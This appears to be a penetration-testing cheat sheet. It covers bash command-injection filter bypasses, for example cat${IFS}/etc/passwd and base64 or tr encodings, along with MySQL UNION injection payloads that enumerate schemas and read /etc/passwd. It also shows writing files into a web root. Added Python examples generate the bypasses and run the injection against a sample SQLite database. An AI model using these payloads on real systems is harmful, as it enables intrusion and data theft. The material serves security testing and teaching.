The following string can be used to test a large number of templating engines in one go:
$ { { < % [ % ' " } } % \ .
[!IMPORTANT] Remove the spaces between each character! I’ve included them here because it messes up rendering in some places!
Balanced pairs of the same quote type are stripped by bash: $ c'a't becomes $ cat, and $ c"a"t likewise.
A backslash in front of an ordinary character is simply dropped by the shell: $ c\at becomes $ cat.
Insert the positional-parameter expansion, which is empty when no arguments were passed: $ c$@at becomes $ cat.
$(rev<<<'tac') becomes cat. Experiment with other transformations such as rot13.
$(base64 -d<<<"Y2F0Cg==") becomes cat
Useful encodings and expansions for spaces and filtered characters:
%0a: newline
%20: space
%09: tab
${IFS}: Input Field Separators (typically space, tab, newline), so cat${IFS}/etc/passwd runs without a literal space
{ls,-la} turns into ls -la (brace expansion)
echo ${PATH:0:1} prints / (the first character of PATH)
echo ${LS_COLORS:10:1} prints ; with the usual LS_COLORS default (rs=0:di=01;34:...)
<<< (here-string) feeds a string to stdin without a pipe, as in the rev and base64 examples above
echo $(tr '!-}' '"-~'<<<[) shifts each character in the range ! to } one to the right, so [ becomes \ and you obtain a backslash without ever sending one. Extend the second set so that ~ wraps round to ! and the whole printable range can be shifted; the generator below does this for an arbitrary shift:
# Print an `echo $(tr ...)` one-liner that outputs CHAR shifted SHIFT positions to the
# right within the printable range '!'..'~', wrapping '~' back round to '!'.
shift_generator() {
  local shift=$1
  local char=$2
  local second_start=$((33 + shift))     # first character of the rotated set
  local second_end=$((33 + shift - 1))   # last character of the rotated set
  # tr's first set is the whole printable range; the second set is the same range
  # rotated left by SHIFT, so every input character maps to the one SHIFT to its right.
  # The '!' is backslash-escaped so the line is also safe to paste into an interactive
  # shell with history expansion; tr treats '\!' as a plain '!'.
  printf "echo \$(tr '\\!-~' '"
  printf '%b-~\\!-%b' "$(printf '\\%03o' "$second_start")" "$(printf '\\%03o' "$second_end")"
  printf "'<<<'%s')\n" "$char"
}
# usage: prints   echo $(tr '\!-~' '"-~\!-!'<<<'~')   which, when run, outputs !
shift_generator 1 "~"
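The substitutions above can be produced and checked mechanically. The following is an added example and not code from the original page: Python functions that build each obfuscated form of a command (quote insertion, backslashes, $@, ${IFS}, brace expansion, base64 and the tr character shift) and, when bash is available, run every variant through `bash -c` to confirm it still behaves like the plain command. The sample command `echo ok`, the function names and the restriction of the tr shift to 1..5 (which keeps the second tr set free of quote and backslash characters) are choices made for this example; the rev variant is left out because rev is not installed everywhere.

```python
import base64
import shlex
import shutil
import subprocess

# Added example (not from the original page): generate the bash obfuscations
# listed above for a command and check that bash still runs each one.

PRINTABLE_LO, PRINTABLE_HI = 33, 126   # '!' .. '~', the range tr '!-~' covers


def insert_quotes(cmd: str) -> str:
    """c'a't: bash strips balanced, unescaped single quotes from each word."""
    words = cmd.split(" ")
    return " ".join(w[0] + "'" + w[1:-1] + "'" + w[-1] if len(w) >= 3 else w for w in words)


def backslash(cmd: str) -> str:
    r"""\c\a\t: a backslash before an ordinary letter is dropped by the shell."""
    return " ".join("".join("\\" + c if c.isalpha() else c for c in w) for w in cmd.split(" "))


def positional(cmd: str) -> str:
    """c$@at: $@ expands to nothing when no positional parameters were passed."""
    return " ".join(w[0] + "$@" + w[1:] for w in cmd.split(" "))


def ifs(cmd: str) -> str:
    """echo${IFS}ok: the unquoted expansion of IFS is itself subject to word splitting."""
    return cmd.replace(" ", "${IFS}")


def brace(cmd: str) -> str:
    """{echo,ok}: brace expansion rebuilds the argument list without any space."""
    words = cmd.split(" ")
    if len(words) < 2:
        raise ValueError("brace expansion needs a comma, i.e. at least two words")
    return "{" + ",".join(words) + "}"


def b64(cmd: str) -> str:
    """$(base64 -d<<<...): the decoded text is substituted back and then executed."""
    return '$(base64 -d<<<"' + base64.b64encode(cmd.encode()).decode() + '")'


def tr_shift(cmd: str, shift: int = 1) -> str:
    """$(tr '!-~' '"-~!-!'<<<'dbgn nj'): send the command shifted LEFT by `shift`
    positions and let tr rotate it back.  Only '!'..'~' rotate; space passes through."""
    if not 1 <= shift <= 5:
        raise ValueError("shift must be 1..5 so the tr set stays safe inside single quotes")
    span = PRINTABLE_HI - PRINTABLE_LO + 1

    def rot(c: str, k: int) -> str:
        if PRINTABLE_LO <= ord(c) <= PRINTABLE_HI:
            return chr(PRINTABLE_LO + (ord(c) - PRINTABLE_LO + k) % span)
        return c

    shifted = "".join(rot(c, -shift) for c in cmd)
    # second set = printable range rotated left by `shift`: e.g. "-~ followed by !-!
    set2 = chr(PRINTABLE_LO + shift) + "-~!-" + chr(PRINTABLE_LO + shift - 1)
    return "$(tr '!-~' '" + set2 + "'<<<" + shlex.quote(shifted) + ")"


def all_variants(cmd: str) -> dict:
    return {
        "quotes": insert_quotes(cmd), "backslash": backslash(cmd),
        "positional": positional(cmd), "ifs": ifs(cmd), "brace": brace(cmd),
        "base64": b64(cmd), "tr_shift": tr_shift(cmd),
    }


def have_bash() -> bool:
    return shutil.which("bash") is not None


def run_bash(snippet: str) -> str:
    return subprocess.run(["bash", "-c", snippet], capture_output=True, text=True,
                          check=True).stdout


def verify(cmd: str) -> dict:
    """Map each variant name to whether bash printed the same as the plain command."""
    expected = run_bash(cmd)
    results = {}
    for name, payload in all_variants(cmd).items():
        try:
            results[name] = run_bash(payload) == expected
        except subprocess.CalledProcessError:
            results[name] = False
    return results


if __name__ == "__main__":
    for name, payload in all_variants("echo ok").items():
        print(f"{name:10} {payload}")
    if have_bash():
        print(verify("echo ok"))
```

Each generator is one line of bash semantics; `verify` is the part worth keeping around, because a filter bypass that changes what the shell actually runs is worse than one that is blocked.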
For more advanced obfuscation you can consider tools such as:
Using a UNION injection we can enumerate the structure of a MySQL/MariaDB database.
Here are some minimal examples. Remember to determine the correct number of columns first and match it (pad with NULLs). Also remember to add WHERE clauses to narrow the search down, e.g. WHERE TABLE_SCHEMA=database().
UNION SELECT SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA;
UNION SELECT TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES;
UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;
UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES;
After enumerating user privileges, if you find one which has FILE you can use it to read files from the target (subject to secure_file_priv, see below):
UNION SELECT LOAD_FILE('/etc/passwd')
Pro tip: for tools without a --proxy flag, use proxychains to route them through Burp!
Writing files from the database (the FILE privilege plus a permissive secure_file_priv) should not be possible on any modern, hardened system, but if it is you can use it to drop a web shell and get remote code execution.
secure_file_priv can have the following values:
NULL: file import and export (LOAD_FILE, INTO OUTFILE) are disabled entirely
"" (empty string): the server can read and write anywhere the mysqld process can
"/path/to/dir": reads and writes are limited to that directory
SHOW VARIABLES LIKE 'secure_file_priv';
You can get this through a union injection by querying information_schema (MariaDB and older MySQL; MySQL 5.7 gates this table behind show_compatibility_56 and MySQL 8 only has performance_schema.global_variables):
UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES
Write a proof-of-concept file into the web root (requires FILE, a secure_file_priv that permits the path, and a directory the mysqld user can write to; INTO OUTFILE refuses to overwrite an existing file):
SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"
A union injection causes additional rows to be added to the result set by using the UNION clause. To do this, we need to know the number of columns in the target result set.
There are two easy strategies for this: order by, or union with an increasing number of columns. Assume that the following is vulnerable:
SELECT * from users where username='$oops'
order by: In MySQL you can use numeric arguments for order by, which refer to result columns by position, so they let you infer the number of columns. Let $oops = "test' order by 1 -- " and the query becomes:
SELECT * from users where username='test' order by 1 -- '
Increase the number until the database errors (Unknown column 'N' in 'order clause'); the last value that succeeds is the column count.
union: Alternatively append UNION SELECT NULL, adding one NULL at a time, until the statement stops failing with a column-count mismatch.
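Here is the column-count hunt from this section and the table enumeration from the union section above carried through on a deliberately vulnerable query, as an added example that is not part of the original page. It uses Python's built-in sqlite3 as a stand-in for MySQL/MariaDB: the ORDER BY and UNION NULL probes behave the same way, but the error messages differ and sqlite_master plays the role of INFORMATION_SCHEMA.TABLES. The schema, rows and function names are constructed for the example, and the parameterised `safe_lookup` is included as the hardened form of the same query.

```python
import sqlite3

# Added example, not code from the original page. SQLite stands in for the
# MySQL/MariaDB target; the schema and rows below are constructed.
SAMPLE_SCHEMA = """
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'alice', 'hunter2');
CREATE TABLE api_keys (id INTEGER, key TEXT);
INSERT INTO api_keys VALUES (1, 'k-0001');
"""


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SAMPLE_SCHEMA)
    return con


DB = make_db()


def vulnerable_lookup(con, oops: str) -> list:
    """The page's vulnerable pattern: $oops is pasted straight into the SQL text."""
    return con.execute(f"SELECT * FROM users WHERE username='{oops}'").fetchall()


def safe_lookup(con, username: str) -> list:
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    return con.execute("SELECT * FROM users WHERE username=?", (username,)).fetchall()


def columns_via_order_by(con, max_cols: int = 32) -> int:
    """Strategy 1: ORDER BY n succeeds while n <= column count and errors after."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(con, f"test' ORDER BY {n} -- ")
        except sqlite3.OperationalError:   # MySQL: Unknown column 'n' in 'order clause'
            return n - 1
    raise RuntimeError("more than max_cols columns?")


def columns_via_union(con, max_cols: int = 32) -> int:
    """Strategy 2: UNION SELECT NULL,... only parses when the NULL count matches."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            vulnerable_lookup(con, f"test' UNION SELECT {nulls} -- ")
            return n
        except sqlite3.OperationalError:   # MySQL: different number of columns
            continue
    raise RuntimeError("more than max_cols columns?")


def enumerate_tables(con, ncols: int) -> list:
    """Same idea as UNION SELECT TABLE_NAME,... FROM INFORMATION_SCHEMA.TABLES,
    padded with NULLs so the column count matches the original query."""
    select_list = ",".join(["name"] + ["NULL"] * (ncols - 1))
    rows = vulnerable_lookup(
        con, f"test' UNION SELECT {select_list} FROM sqlite_master WHERE type='table' -- ")
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    n = columns_via_order_by(DB)
    print("columns (order by):", n, " (union):", columns_via_union(DB))
    print("tables:", enumerate_tables(DB, n))
    print("same payload through the parameterised query:",
          safe_lookup(DB, "test' ORDER BY 1 -- "))
```

The `-- ` trailer (note the space) comments out the closing quote the application appends; against MySQL the same probes work, only the exception text you match on changes.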
Here are some resources containing XSS payloads:
echo 'test' | base64                        # base64 encode: dGVzdAo= (the trailing newline is encoded too)
echo 'dGVzdAo=' | base64 -d                 # base64 decode: test
echo 'test' | xxd -p                        # hex encode: 746573740a
echo '746573740a' | xxd -p -r               # hex decode: test
echo 'test' | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # rot13: grfg
echo 'grfg' | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # rot13 is its own inverse: test